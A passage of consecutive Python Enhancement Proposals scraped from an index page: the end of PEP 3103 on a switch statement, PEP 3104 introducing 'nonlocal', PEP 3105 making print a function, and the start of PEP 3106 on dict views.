lots of developer time. Under school II, in this situation
incorrect results are produced at least consistently, which should
make debugging a bit easier. The way out proposed for the previous
bullet would also help here.
School Ib doesn’t have a good optimization strategy if the case
expressions are named constants. The compiler cannot know their
values for sure, and it cannot know whether they are truly constant.
As a way out, it has been proposed to re-evaluate the expression
corresponding to the case once the dict has identified which case
should be taken, to verify that the value of the expression didn’t
change. But strictly speaking, all the case expressions occurring
before that case would also have to be checked, in order to preserve
the true if/elif chain semantics, thereby completely killing the
optimization. Another proposed solution is to have callbacks
notifying the dispatch dict of changes in the value of variables or
attributes involved in the case expressions. But this is not likely
implementable in the general case, and would require many namespaces
to bear the burden of supporting such callbacks, which currently
don’t exist at all.
Finally, there’s a difference of opinion regarding the treatment of
duplicate cases (i.e. two or more cases with match expressions that
evaluates to the same value). School I wants to treat this the same
is an if/elif chain would treat it (i.e. the first match wins and
the code for the second match is silently unreachable); school II
wants this to be an error at the time the dispatch dict is frozen
(so dead code doesn’t go undiagnosed).
School I sees trouble in school II’s approach of pre-freezing a
dispatch dict because it places a new and unusual burden on
programmers to understand exactly what kinds of case values are
allowed to be frozen and when the case values will be frozen, or they
might be surprised by the switch statement’s behavior.
School II doesn’t believe that school Ia’s unoptimized switch is worth
the effort, and it sees trouble in school Ib’s proposal for
optimization, which can cause optimized and unoptimized code to behave
differently.
In addition, school II sees little value in allowing cases involving
unhashable values; after all if the user expects such values, they can
just as easily write an if/elif chain. School II also doesn’t believe
that it’s right to allow dead code due to overlapping cases to occur
unflagged, when the dict-based dispatch implementation makes it so
easy to trap this.
However, there are some use cases for overlapping/duplicate cases.
Suppose you’re switching on some OS-specific constants (e.g. exported
by the os module or some module like that). You have a case for each.
But on some OS, two different constants have the same value (since on
that OS they are implemented the same way – like O_TEXT and O_BINARY
on Unix). If duplicate cases are flagged as errors, your switch
wouldn’t work at all on that OS. It would be much better if you could
arrange the cases so that one case has preference over another.
There’s also the (more likely) use case where you have a set of cases
to be treated the same, but one member of the set must be treated
differently. It would be convenient to put the exception in an
earlier case and be done with it.
(Yes, it seems a shame not to be able to diagnose dead code due to
accidental case duplication. Maybe that’s less important, and
pychecker can deal with it? After all we don’t diagnose duplicate
method definitions either.)
This suggests school IIb: like school II but redundant cases must be
resolved by choosing the first match. This is trivial to implement
when building the dispatch dict (skip keys already present).
(An alternative would be to introduce new syntax to indicate “okay to
have overlapping cases” or “ok if this case is dead code” but I find
that overkill.)
Personally, I’m in school II: I believe that the dict-based dispatch
is the one true implementation for switch statements and that we
should face the limitations up front, so that we can reap maximal
benefits. I’m leaning towards school IIb – duplicate cases should be
resolved by the ordering of the cases instead of flagged as errors.
When to Freeze the Dispatch Dict
For the supporters of school II (dict-based dispatch), the next big
dividing issue is when to create the dict used for switching. I call
this “freezing the dict”.
The main problem that makes this interesting is the observation that
Python doesn’t have named compile-time constants. What is
conceptually a constant, such as re.IGNORECASE, is a variable to the
compiler, and there’s nothing to stop crooked code from modifying its
value.
Option 1
The most limiting option is to freeze the dict in the compiler. This
would require that the case expressions are all literals or
compile-time expressions involving only literals and operators whose
semantics are known to the compiler, since with the current state of
Python’s dynamic semantics and single-module compilation, there is no
hope for the compiler to know with sufficient certainty the values of
any variables occurring in such expressions. This is widely though
not universally considered too restrictive.
Raymond Hettinger is the main advocate of this approach. He proposes
a syntax where only a single literal of certain types is allowed as
the case expression. It has the advantage of being unambiguous and
easy to implement.
My main complaint about this is that by disallowing “named constants”
we force programmers to give up good habits. Named constants are
introduced in most languages to solve the problem of “magic numbers”
occurring in the source code. For example, sys.maxint is a lot more
readable than 2147483647. Raymond proposes to use string literals
instead of named “enums”, observing that the string literal’s content
can be the name that the constant would otherwise have. Thus, we
could write “case ‘IGNORECASE’:” instead of “case re.IGNORECASE:”.
However, if there is a spelling error in the string literal, the case
will silently be ignored, and who knows when the bug is detected. If
there is a spelling error in a NAME, however, the error will be caught
as soon as it is evaluated. Also, sometimes the constants are
externally defined (e.g. when parsing a file format like JPEG) and we
can’t easily choose appropriate string values. Using an explicit
mapping dict sounds like a poor hack.
Option 2
The oldest proposal to deal with this is to freeze the dispatch dict
the first time the switch is executed. At this point we can assume
that all the named “constants” (constant in the programmer’s mind,
though not to the compiler) used as case expressions are defined –
otherwise an if/elif chain would have little chance of success either.
Assuming the switch will be executed many times, doing some extra work
the first time pays back quickly by very quick dispatch times later.
An objection to this option is that there is no obvious object where
the dispatch dict can be stored. It can’t be stored on the code
object, which is supposed to be immutable; it can’t be stored on the
function object, since many function objects may be created for the
same function (e.g. for nested functions). In practice, I’m sure that
something can be found; it could be stored in a section of the code
object that’s not considered when comparing two code objects or when
pickling or marshalling a code object; or all switches could be stored
in a dict indexed by weak references to code objects. The solution
should also be careful not to leak switch dicts between multiple
interpreters.
Another objection is that the first-use rule allows obfuscated code
like this:
def foo(x, y):
switch x:
case y:
print 42
To the untrained eye (not familiar with Python) this code would be
equivalent to this:
def foo(x, y):
if x == y:
print 42
but that’s not what it does (unless it is always called with the same
value as the second argument). This has been addressed by suggesting
that the case expressions should not be allowed to reference local
variables, but this is somewhat arbitrary.
A final objection is that in a multi-threaded application, the
first-use rule requires intricate locking in order to guarantee the
correct semantics. (The first-use rule suggests a promise that side
effects of case expressions are incurred exactly once.) This may be
as tricky as the import lock has proved to be, since the lock has to
be held while all the case expressions are being evaluated.
Option 3
A proposal that has been winning support (including mine) is to freeze
a switch’s dict when the innermost function containing it is defined.
The switch dict is stored on the function object, just as parameter
defaults are, and in fact the case expressions are evaluated at the
same time and in the same scope as the parameter defaults (i.e. in the
scope containing the function definition).
This option has the advantage of avoiding many of the finesses needed
to make option 2 work: there’s no need for locking, no worry about
immutable code objects or multiple interpreters. It also provides a
clear explanation for why locals can’t be referenced in case
expressions.
This option works just as well for situations where one would
typically use a switch; case expressions involving imported or global
named constants work exactly the same way as in option 2, as long as
they are imported or defined before the function definition is
encountered.
A downside however is that the dispatch dict for a switch inside a
nested function must be recomputed each time the nested function is
defined. For certain “functional” styles of programming this may make
switch unattractive in nested functions. (Unless all case expressions
are compile-time constants; then the compiler is of course free to
optimize away the switch freezing code and make the dispatch table part
of the code object.)
Another downside is that under this option, there’s no clear moment
when the dispatch dict is frozen for a switch that doesn’t occur
inside a function. There are a few pragmatic choices for how to treat
a switch outside a function:
Disallow it.
Translate it into an if/elif chain.
Allow only compile-time constant expressions.
Compute the dispatch dict each time the switch is reached.
Like (b) but tests that all expressions evaluated are hashable.
Of these, (a) seems too restrictive: it’s uniformly worse than (c);
and (d) has poor performance for little or no benefits compared to
(b). It doesn’t make sense to have a performance-critical inner loop
at the module level, as all local variable references are slow there;
hence (b) is my (weak) favorite. Perhaps I should favor (e), which
attempts to prevent atypical use of a switch; examples that work
interactively but not in a function are annoying. In the end I don’t
think this issue is all that important (except it must be resolved
somehow) and am willing to leave it up to whoever ends up implementing
it.
When a switch occurs in a class but not in a function, we can freeze
the dispatch dict at the same time the temporary function object
representing the class body is created. This means the case
expressions can reference module globals but not class variables.
Alternatively, if we choose (b) above, we could choose this
implementation inside a class definition as well.
Option 4
There are a number of proposals to add a construct to the language
that makes the concept of a value pre-computed at function definition
time generally available, without tying it either to parameter default
values or case expressions. Some keywords proposed include ‘const’,
‘static’, ‘only’ or ‘cached’. The associated syntax and semantics
vary.
These proposals are out of scope for this PEP, except to suggest that
if such a proposal is accepted, there are two ways for the switch to
benefit: we could require case expressions to be either compile-time
constants or pre-computed values; or we could make pre-computed values
the default (and only) evaluation mode for case expressions. The
latter would be my preference, since I don’t see a use for more
dynamic case expressions that isn’t addressed adequately by writing an
explicit if/elif chain.
Conclusion
It is too early to decide. I’d like to see at least one completed
proposal for pre-computed values before deciding. In the meantime,
Python is fine without a switch statement, and perhaps those who claim
it would be a mistake to add one are right.
Copyright
This document has been placed in the public domain.
| Rejected | PEP 3103 – A Switch/Case Statement | Standards Track | Python-dev has recently seen a flurry of discussion on adding a switch
statement. In this PEP I’m trying to extract my own preferences from
the smorgasbord of proposals, discussing alternatives and explaining
my choices where I can. I’ll also indicate how strongly I feel about
alternatives I discuss. |
PEP 3104 – Access to Names in Outer Scopes
Author:
Ka-Ping Yee <ping at zesty.ca>
Status:
Final
Type:
Standards Track
Created:
12-Oct-2006
Python-Version:
3.0
Post-History:
Table of Contents
Abstract
Rationale
Other Languages
JavaScript, Perl, Scheme, Smalltalk, GNU C, C# 2.0
Ruby (as of 1.8)
Overview of Proposals
New Syntax in the Binding (Outer) Scope
Scope Override Declaration
Required Variable Declaration
New Syntax in the Referring (Inner) Scope
Outer Reference Expression
Rebinding Operator
Scope Override Declaration
Proposed Solution
Backward Compatibility
References
Acknowledgements
Copyright
Abstract
In most languages that support nested scopes, code can refer to or
rebind (assign to) any name in the nearest enclosing scope.
Currently, Python code can refer to a name in any enclosing scope,
but it can only rebind names in two scopes: the local scope (by
simple assignment) or the module-global scope (using a global
declaration).
This limitation has been raised many times on the Python-Dev mailing
list and elsewhere, and has led to extended discussion and many
proposals for ways to remove this limitation. This PEP summarizes
the various alternatives that have been suggested, together with
advantages and disadvantages that have been mentioned for each.
Rationale
Before version 2.1, Python’s treatment of scopes resembled that of
standard C: within a file there were only two levels of scope, global
and local. In C, this is a natural consequence of the fact that
function definitions cannot be nested. But in Python, though
functions are usually defined at the top level, a function definition
can be executed anywhere. This gave Python the syntactic appearance
of nested scoping without the semantics, and yielded inconsistencies
that were surprising to some programmers – for example, a recursive
function that worked at the top level would cease to work when moved
inside another function, because the recursive function’s own name
would no longer be visible in its body’s scope. This violates the
intuition that a function should behave consistently when placed in
different contexts. Here’s an example:
def enclosing_function():
def factorial(n):
if n < 2:
return 1
return n * factorial(n - 1) # fails with NameError
print factorial(5)
Python 2.1 moved closer to static nested scoping by making visible
the names bound in all enclosing scopes (see PEP 227). This change
makes the above code example work as expected. However, because any
assignment to a name implicitly declares that name to be local, it is
impossible to rebind a name in an outer scope (except when a
global declaration forces the name to be global). Thus, the
following code, intended to display a number that can be incremented
and decremented by clicking buttons, doesn’t work as someone familiar
with lexical scoping might expect:
def make_scoreboard(frame, score=0):
label = Label(frame)
label.pack()
for i in [-10, -1, 1, 10]:
def increment(step=i):
score = score + step # fails with UnboundLocalError
label['text'] = score
button = Button(frame, text='%+d' % i, command=increment)
button.pack()
return label
Python syntax doesn’t provide a way to indicate that the name
score mentioned in increment refers to the variable score
bound in make_scoreboard, not a local variable in increment.
Users and developers of Python have expressed an interest in removing
this limitation so that Python can have the full flexibility of the
Algol-style scoping model that is now standard in many programming
languages, including JavaScript, Perl, Ruby, Scheme, Smalltalk,
C with GNU extensions, and C# 2.0.
It has been argued that such a feature isn’t necessary, because
a rebindable outer variable can be simulated by wrapping it in a
mutable object:
class Namespace:
pass
def make_scoreboard(frame, score=0):
ns = Namespace()
ns.score = 0
label = Label(frame)
label.pack()
for i in [-10, -1, 1, 10]:
def increment(step=i):
ns.score = ns.score + step
label['text'] = ns.score
button = Button(frame, text='%+d' % i, command=increment)
button.pack()
return label
However, this workaround only highlights the shortcomings of existing
scopes: the purpose of a function is to encapsulate code in its own
namespace, so it seems unfortunate that the programmer should have to
create additional namespaces to make up for missing functionality in
the existing local scopes, and then have to decide whether each name
should reside in the real scope or the simulated scope.
Another common objection is that the desired functionality can be
written as a class instead, albeit somewhat more verbosely. One
rebuttal to this objection is that the existence of a different
implementation style is not a reason to leave a supported programming
construct (nested scopes) functionally incomplete. Python is
sometimes called a “multi-paradigm language” because it derives so
much strength, practical flexibility, and pedagogical power from its
support and graceful integration of multiple programming paradigms.
A proposal for scoping syntax appeared on Python-Dev as far back as
1994 [1], long before PEP 227’s support for nested scopes was
adopted. At the time, Guido’s response was:
This is dangerously close to introducing CSNS [classic static
nested scopes]. If you were to do so, your proposed semantics
of scoped seem alright. I still think there is not enough need
for CSNS to warrant this kind of construct …
After PEP 227, the “outer name rebinding discussion” has reappeared
on Python-Dev enough times that it has become a familiar event,
having recurred in its present form since at least 2003 [2].
Although none of the language changes proposed in these discussions
have yet been adopted, Guido has acknowledged that a language change
is worth considering [12].
Other Languages
To provide some background, this section describes how some other
languages handle nested scopes and rebinding.
JavaScript, Perl, Scheme, Smalltalk, GNU C, C# 2.0
These languages use variable declarations to indicate scope. In
JavaScript, a lexically scoped variable is declared with the var
keyword; undeclared variable names are assumed to be global. In
Perl, a lexically scoped variable is declared with the my
keyword; undeclared variable names are assumed to be global. In
Scheme, all variables must be declared (with define or let,
or as formal parameters). In Smalltalk, any block can begin by
declaring a list of local variable names between vertical bars.
C and C# require type declarations for all variables. For all these
cases, the variable belongs to the scope containing the declaration.
Ruby (as of 1.8)
Ruby is an instructive example because it appears to be the only
other currently popular language that, like Python, tries to support
statically nested scopes without requiring variable declarations, and
thus has to come up with an unusual solution. Functions in Ruby can
contain other function definitions, and they can also contain code
blocks enclosed in curly braces. Blocks have access to outer
variables, but nested functions do not. Within a block, an
assignment to a name implies a declaration of a local variable only
if it would not shadow a name already bound in an outer scope;
otherwise assignment is interpreted as rebinding of the outer name.
Ruby’s scoping syntax and rules have also been debated at great
length, and changes seem likely in Ruby 2.0 [28].
Overview of Proposals
There have been many different proposals on Python-Dev for ways to
rebind names in outer scopes. They all fall into two categories:
new syntax in the scope where the name is bound, or new syntax in
the scope where the name is used.
New Syntax in the Binding (Outer) Scope
Scope Override Declaration
The proposals in this category all suggest a new kind of declaration
statement similar to JavaScript’s var. A few possible keywords
have been proposed for this purpose:
scope x [4]
var x [4] [9]
my x [13]
In all these proposals, a declaration such as var x in a
particular scope S would cause all references to x in scopes
nested within S to refer to the x bound in S.
The primary objection to this category of proposals is that the
meaning of a function definition would become context-sensitive.
Moving a function definition inside some other block could cause any
of the local name references in the function to become nonlocal, due
to declarations in the enclosing block. For blocks in Ruby 1.8,
this is actually the case; in the following example, the two setters
have different effects even though they look identical:
setter1 = proc { | x | y = x } # y is local here
y = 13
setter2 = proc { | x | y = x } # y is nonlocal here
setter1.call(99)
puts y # prints 13
setter2.call(77)
puts y # prints 77
Note that although this proposal resembles declarations in JavaScript
and Perl, the effect on the language is different because in those
languages undeclared variables are global by default, whereas in
Python undeclared variables are local by default. Thus, moving
a function inside some other block in JavaScript or Perl can only
reduce the scope of a previously global name reference, whereas in
Python with this proposal, it could expand the scope of a previously
local name reference.
Required Variable Declaration
A more radical proposal [21] suggests removing Python’s scope-guessing
convention altogether and requiring that all names be declared in the
scope where they are to be bound, much like Scheme. With this
proposal, var x = 3 would both declare x to belong to the
local scope and bind it, where as x = 3 would rebind the existing
visible x. In a context without an enclosing scope containing a
var x declaration, the statement x = 3 would be statically
determined to be illegal.
This proposal yields a simple and consistent model, but it would be
incompatible with all existing Python code.
New Syntax in the Referring (Inner) Scope
There are three kinds of proposals in this category.
Outer Reference Expression
This type of proposal suggests a new way of referring to a variable
in an outer scope when using the variable in an expression. One
syntax that has been suggested for this is .x [7], which would
refer to x without creating a local binding for it. A concern
with this proposal is that in many contexts x and .x could
be used interchangeably, which would confuse the reader [31]. A
closely related idea is to use multiple dots to specify the number
of scope levels to ascend [8], but most consider this too error-prone
[17].
Rebinding Operator
This proposal suggests a new assignment-like operator that rebinds
a name without declaring the name to be local [2]. Whereas the
statement x = 3 both declares x a local variable and binds
it to 3, the statement x := 3 would change the existing binding
of x without declaring it local.
This is a simple solution, but according to PEP 3099 it has been
rejected (perhaps because it would be too easy to miss or to confuse
with =).
Scope Override Declaration
The proposals in this category suggest a new kind of declaration
statement in the inner scope that prevents a name from becoming
local. This statement would be similar in nature to the global
statement, but instead of making the name refer to a binding in the
top module-level scope, it would make the name refer to the binding
in the nearest enclosing scope.
This approach is attractive due to its parallel with a familiar
Python construct, and because it retains context-independence for
function definitions.
This approach also has advantages from a security and debugging
perspective. The resulting Python would not only match the
functionality of other nested-scope languages but would do so with a
syntax that is arguably even better for defensive programming. In
most other languages, a declaration contracts the scope of an
existing name, so inadvertently omitting the declaration could yield
farther-reaching (i.e. more dangerous) effects than expected. In
Python with this proposal, the extra effort of adding the declaration
is aligned with the increased risk of non-local effects (i.e. the
path of least resistance is the safer path).
Many spellings have been suggested for such a declaration:
scoped x [1]
global x in f [3] (explicitly specify which scope)
free x [5]
outer x [6]
use x [9]
global x [10] (change the meaning of global)
nonlocal x [11]
global x outer [18]
global in x [18]
not global x [18]
extern x [20]
ref x [22]
refer x [22]
share x [22]
sharing x [22]
common x [22]
using x [22]
borrow x [22]
reuse x [23]
scope f x [25] (explicitly specify which scope)
The most commonly discussed choices appear to be outer,
global, and nonlocal. outer is already used as both a
variable name and an attribute name in the standard library. The
word global has a conflicting meaning, because “global variable”
is generally understood to mean a variable with top-level scope [27].
In C, the keyword extern means that a name refers to a variable
in a different compilation unit. While nonlocal is a bit long
and less pleasant-sounding than some of the other options, it does
have precisely the correct meaning: it declares a name not local.
Proposed Solution
The solution proposed by this PEP is to add a scope override
declaration in the referring (inner) scope. Guido has expressed a
preference for this category of solution on Python-Dev [14] and has
shown approval for nonlocal as the keyword [19].
The proposed declaration:
nonlocal x
prevents x from becoming a local name in the current scope. All
occurrences of x in the current scope will refer to the x
bound in an outer enclosing scope. As with global, multiple
names are permitted:
nonlocal x, y, z
If there is no pre-existing binding in an enclosing scope, the
compiler raises a SyntaxError. (It may be a bit of a stretch to
call this a syntax error, but so far SyntaxError is used for all
compile-time errors, including, for example, __future__ import
with an unknown feature name.) Guido has said that this kind of
declaration in the absence of an outer binding should be considered
an error [16].
If a nonlocal declaration collides with the name of a formal
parameter in the local scope, the compiler raises a SyntaxError.
A shorthand form is also permitted, in which nonlocal is
prepended to an assignment or augmented assignment:
nonlocal x = 3
The above has exactly the same meaning as nonlocal x; x = 3.
(Guido supports a similar form of the global statement [24].)
On the left side of the shorthand form, only identifiers are allowed,
not target expressions like x[0]. Otherwise, all forms of
assignment are allowed. The proposed grammar of the nonlocal
statement is:
nonlocal_stmt ::=
"nonlocal" identifier ("," identifier)*
["=" (target_list "=")+ expression_list]
| "nonlocal" identifier augop expression_list
The rationale for allowing all these forms of assignment is that it
simplifies understanding of the nonlocal statement. Separating
the shorthand form into a declaration and an assignment is sufficient
to understand what it means and whether it is valid.
Note
The shorthand syntax was not added in the original implementation
of the PEP. Later discussions [29] [30] concluded this syntax
should not be implemented.
Backward Compatibility
This PEP targets Python 3000, as suggested by Guido [19]. However,
others have noted that some options considered in this PEP may be
small enough changes to be feasible in Python 2.x [26], in which
case this PEP could possibly be moved to be a 2.x series PEP.
As a (very rough) measure of the impact of introducing a new keyword,
here is the number of times that some of the proposed keywords appear
as identifiers in the standard library, according to a scan of the
Python SVN repository on November 5, 2006:
nonlocal 0
use 2
using 3
reuse 4
free 8
outer 147
global appears 214 times as an existing keyword. As a measure
of the impact of using global as the outer-scope keyword, there
are 18 files in the standard library that would break as a result
of such a change (because a function declares a variable global
before that variable has been introduced in the global scope):
cgi.py
dummy_thread.py
mhlib.py
mimetypes.py
idlelib/PyShell.py
idlelib/run.py
msilib/__init__.py
test/inspect_fodder.py
test/test_compiler.py
test/test_decimal.py
test/test_descr.py
test/test_dummy_threading.py
test/test_fileinput.py
test/test_global.py (not counted: this tests the keyword itself)
test/test_grammar.py (not counted: this tests the keyword itself)
test/test_itertools.py
test/test_multifile.py
test/test_scope.py (not counted: this tests the keyword itself)
test/test_threaded_import.py
test/test_threadsignals.py
test/test_warnings.py
References
[1] (1, 2)
Scoping (was Re: Lambda binding solved?) (Rafael Bracho)
https://legacy.python.org/search/hypermail/python-1994q1/0301.html
[2] (1, 2)
Extended Function syntax (Just van Rossum)
https://mail.python.org/pipermail/python-dev/2003-February/032764.html
[3]
Closure semantics (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2003-October/039214.html
[4] (1, 2)
Better Control of Nested Lexical Scopes (Almann T. Goo)
https://mail.python.org/pipermail/python-dev/2006-February/061568.html
[5]
PEP for Better Control of Nested Lexical Scopes (Jeremy Hylton)
https://mail.python.org/pipermail/python-dev/2006-February/061602.html
[6]
PEP for Better Control of Nested Lexical Scopes (Almann T. Goo)
https://mail.python.org/pipermail/python-dev/2006-February/061603.html
[7]
Using and binding relative names (Phillip J. Eby)
https://mail.python.org/pipermail/python-dev/2006-February/061636.html
[8]
Using and binding relative names (Steven Bethard)
https://mail.python.org/pipermail/python-dev/2006-February/061749.html
[9] (1, 2)
Lexical scoping in Python 3k (Ka-Ping Yee)
https://mail.python.org/pipermail/python-dev/2006-July/066862.html
[10]
Lexical scoping in Python 3k (Greg Ewing)
https://mail.python.org/pipermail/python-dev/2006-July/066889.html
[11]
Lexical scoping in Python 3k (Ka-Ping Yee)
https://mail.python.org/pipermail/python-dev/2006-July/066942.html
[12]
Lexical scoping in Python 3k (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2006-July/066950.html
[13]
Explicit Lexical Scoping (pre-PEP?) (Talin)
https://mail.python.org/pipermail/python-dev/2006-July/066978.html
[14]
Explicit Lexical Scoping (pre-PEP?) (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2006-July/066991.html
[15] Explicit Lexical Scoping (pre-PEP?) (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2006-July/066995.html
[16]
Lexical scoping in Python 3k (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2006-July/066968.html
[17]
Explicit Lexical Scoping (pre-PEP?) (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2006-July/067004.html
[18] (1, 2, 3)
Explicit Lexical Scoping (pre-PEP?) (Andrew Clover)
https://mail.python.org/pipermail/python-dev/2006-July/067007.html
[19] (1, 2)
Explicit Lexical Scoping (pre-PEP?) (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2006-July/067067.html
[20]
Explicit Lexical Scoping (pre-PEP?) (Matthew Barnes)
https://mail.python.org/pipermail/python-dev/2006-July/067221.html
[21]
Sky pie: a “var” keyword (a thread started by Neil Toronto)
https://mail.python.org/pipermail/python-3000/2006-October/003968.html
[22] (1, 2, 3, 4, 5, 6, 7)
Alternatives to ‘outer’ (Talin)
https://mail.python.org/pipermail/python-3000/2006-October/004021.html
[23]
Alternatives to ‘outer’ (Jim Jewett)
https://mail.python.org/pipermail/python-3000/2006-November/004153.html
[24]
Draft PEP for outer scopes (Guido van Rossum)
https://mail.python.org/pipermail/python-3000/2006-November/004166.html
[25]
Draft PEP for outer scopes (Talin)
https://mail.python.org/pipermail/python-3000/2006-November/004190.html
[26]
Draft PEP for outer scopes (Alyssa Coghlan)
https://mail.python.org/pipermail/python-3000/2006-November/004237.html
[27]
Global variable (version 2006-11-01T01:23:16)
https://en.wikipedia.org/w/index.php?title=Global_variable&oldid=85001451
[28]
Ruby 2.0 block local variable
https://web.archive.org/web/20070105131417/http://redhanded.hobix.com/inspect/ruby20BlockLocalVariable.html
[29]
Issue 4199: combining assignment with global & nonlocal (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2013-June/127142.html
[30]
Whatever happened to ‘nonlocal x = y’? (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2018-January/151627.html
[31]
Using and binding relative names (Almann T. Goo)
https://mail.python.org/pipermail/python-dev/2006-February/061761.html
Acknowledgements
The ideas and proposals mentioned in this PEP are gleaned from
countless Python-Dev postings. Thanks to Jim Jewett, Mike Orr,
Jason Orendorff, and Christian Tanzer for suggesting specific
edits to this PEP.
Copyright
This document has been placed in the public domain.
| Final | PEP 3104 – Access to Names in Outer Scopes | Standards Track | In most languages that support nested scopes, code can refer to or
rebind (assign to) any name in the nearest enclosing scope.
Currently, Python code can refer to a name in any enclosing scope,
but it can only rebind names in two scopes: the local scope (by
simple assignment) or the module-global scope (using a global
declaration). |
PEP 3105 – Make print a function
Author:
Georg Brandl <georg at python.org>
Status:
Final
Type:
Standards Track
Created:
19-Nov-2006
Python-Version:
3.0
Post-History:
Table of Contents
Abstract
Rationale
Specification
Backwards Compatibility
Implementation
References
Copyright
Abstract
The title says it all – this PEP proposes a new print() builtin
that replaces the print statement and suggests a specific signature
for the new function.
Rationale
The print statement has long appeared on lists of dubious language
features that are to be removed in Python 3000, such as Guido’s “Python
Regrets” presentation [1]. As such, the objective of this PEP is not
new, though it might become much disputed among Python developers.
The following arguments for a print() function are distilled from a
python-3000 message by Guido himself [2]:
print is the only application-level functionality that has a
statement dedicated to it. Within Python’s world, syntax is generally
used as a last resort, when something can’t be done without help from
the compiler. Print doesn’t qualify for such an exception.
At some point in application development one quite often feels the need
to replace print output by something more sophisticated, like
logging calls or calls into some other I/O library. With a print()
function, this is a straightforward string replacement, today it is
a mess adding all those parentheses and possibly converting >>stream
style syntax.
Having special syntax for print puts up a much larger barrier for
evolution, e.g. a hypothetical new printf() function is not too
far fetched when it will coexist with a print() function.
There’s no easy way to convert print statements into another call
if one needs a different separator, not spaces, or none at all.
Also, there’s no easy way at all to conveniently print objects with
some other separator than a space.
If print() is a function, it would be much easier to replace it within
one module (just def print(*args):...) or even throughout a program
(e.g. by putting a different function in __builtin__.print). As it is,
one can do this by writing a class with a write() method and
assigning that to sys.stdout – that’s not bad, but definitely a much
larger conceptual leap, and it works at a different level than print.
Specification
The signature for print(), taken from various mailings and recently
posted on the python-3000 list [3] is:
def print(*args, sep=' ', end='\n', file=None)
A call like:
print(a, b, c, file=sys.stderr)
will be equivalent to today’s:
print >>sys.stderr, a, b, c
while the optional sep and end arguments specify what is printed
between and after the arguments, respectively.
The softspace feature (a semi-secret attribute on files currently
used to tell print whether to insert a space before the first item)
will be removed. Therefore, there will not be a direct translation for
today’s:
print "a",
print
which will not print a space between the "a" and the newline.
Backwards Compatibility
The changes proposed in this PEP will render most of today’s print
statements invalid. Only those which incidentally feature parentheses
around all of their arguments will continue to be valid Python syntax
in version 3.0, and of those, only the ones printing a single
parenthesized value will continue to do the same thing. For example,
in 2.x:
>>> print ("Hello")
Hello
>>> print ("Hello", "world")
('Hello', 'world')
whereas in 3.0:
>>> print ("Hello")
Hello
>>> print ("Hello", "world")
Hello world
Luckily, as it is a statement in Python 2, print can be detected
and replaced reliably and non-ambiguously by an automated tool, so
there should be no major porting problems (provided someone writes the
mentioned tool).
Implementation
The proposed changes were implemented in the Python 3000 branch in the
Subversion revisions 53685 to 53704. Most of the legacy code in the
library has been converted too, but it is an ongoing effort to catch
every print statement that may be left in the distribution.
References
[1]
http://legacy.python.org/doc/essays/ppt/regrets/PythonRegrets.pdf
[2]
Replacement for print in Python 3.0 (Guido van Rossum)
https://mail.python.org/pipermail/python-dev/2005-September/056154.html
[3]
print() parameters in py3k (Guido van Rossum)
https://mail.python.org/pipermail/python-3000/2006-November/004485.html
Copyright
This document has been placed in the public domain.
| Final | PEP 3105 – Make print a function | Standards Track | The title says it all – this PEP proposes a new print() builtin
that replaces the print statement and suggests a specific signature
for the new function. |
PEP 3106 – Revamping dict.keys(), .values() and .items()
Author:
Guido van Rossum
Status:
Final
Type:
Standards Track
Created:
19-Dec-2006
Python-Version:
3.0
Post-History:
Table of Contents
Abstract
Introduction
Specification
Open Issues
References
Abstract
This PEP proposes to change the .keys(), .values() and .items()
methods of the built-in dict type to return a set-like or unordered
container object whose contents are derived from the underlying
dictionary rather than a list which is a copy of the keys, etc.; and
to remove the .iterkeys(), .itervalues() and .iteritems() methods.
The approach is inspired by that taken in the Java Collections
Framework [1].
Introduction
It has long been the plan to change the .keys(), .values() and
.items() methods of the built-in dict type to return a more
lightweight object than a list, and to get rid of .iterkeys(),
.itervalues() and .iteritems(). The idea is that code that currently
(in 2.x) reads:
for k, v in d.iteritems(): ...
should be rewritten as:
for k, v in d.items(): ...
(and similar for .itervalues() and .iterkeys(), except the latter is
redundant since we can write that loop as for k in d.)
Code that currently reads:
a = d.keys() # assume we really want a list here
(etc.) should be rewritten as
a = list(d.keys())
There are (at least) two ways to accomplish this. The original plan
was to simply let .keys(), .values() and .items() return an iterator,
i.e. exactly what iterkeys(), itervalues() and iteritems() return in
Python 2.x. However, the Java Collections Framework [1] suggests
that a better solution is possible: the methods return objects with
set behavior (for .keys() and .items()) or multiset (== bag) behavior
(for .values()) that do not contain copies of the keys, values or
items, but rather reference the underlying dict and pull their values
out of the dict as needed.
The advantage of this approach is that one can still write code like
this:
a = d.items()
for k, v in a: ...
# And later, again:
for k, v in a: ...
Effectively, iter(d.keys()) (etc.) in Python 3.0 will do what
d.iterkeys() (etc.) does in Python 2.x; but in most contexts we don’t
have to write the iter() call because it is implied by a for-loop.
The objects returned by the .keys() and .items() methods behave like
sets. The object returned by the values() method behaves like a much
simpler unordered collection – it cannot be a set because duplicate
values are possible.
Because of the set behavior, it will be possible to check whether two
dicts have the same keys by simply testing:
if a.keys() == b.keys(): ...
and similarly for .items().
These operations are thread-safe only to the extent that using them in
a thread-unsafe way may cause an exception but will not cause
corruption of the internal representation.
As in Python 2.x, mutating a dict while iterating over it using an
iterator has an undefined effect and will in most cases raise a
RuntimeError exception. (This is similar to the guarantees made by
the Java Collections Framework.)
The objects returned by .keys() and .items() are fully interoperable
with instances of the built-in set and frozenset types; for example:
set(d.keys()) == d.keys()
is guaranteed to be True (except when d is being modified
simultaneously by another thread).
Specification
I’m using pseudo-code to specify the semantics:
class dict:
# Omitting all other dict methods for brevity.
# The .iterkeys(), .itervalues() and .iteritems() methods
# will be removed.
def keys(self):
return d_keys(self)
def items(self):
return d_items(self)
def values(self):
return d_values(self)
class d_keys:
def __init__(self, d):
self.__d = d
def __len__(self):
return len(self.__d)
def __contains__(self, key):
return key in self.__d
def __iter__(self):
for key in self.__d:
yield key
# The following operations should be implemented to be
# compatible with sets; this can be done by exploiting
# the above primitive operations:
#
# <, <=, ==, !=, >=, > (returning a bool)
# &, |, ^, - (returning a new, real set object)
#
# as well as their method counterparts (.union(), etc.).
#
# To specify the semantics, we can specify x == y as:
#
# set(x) == set(y) if both x and y are d_keys instances
# set(x) == y if x is a d_keys instance
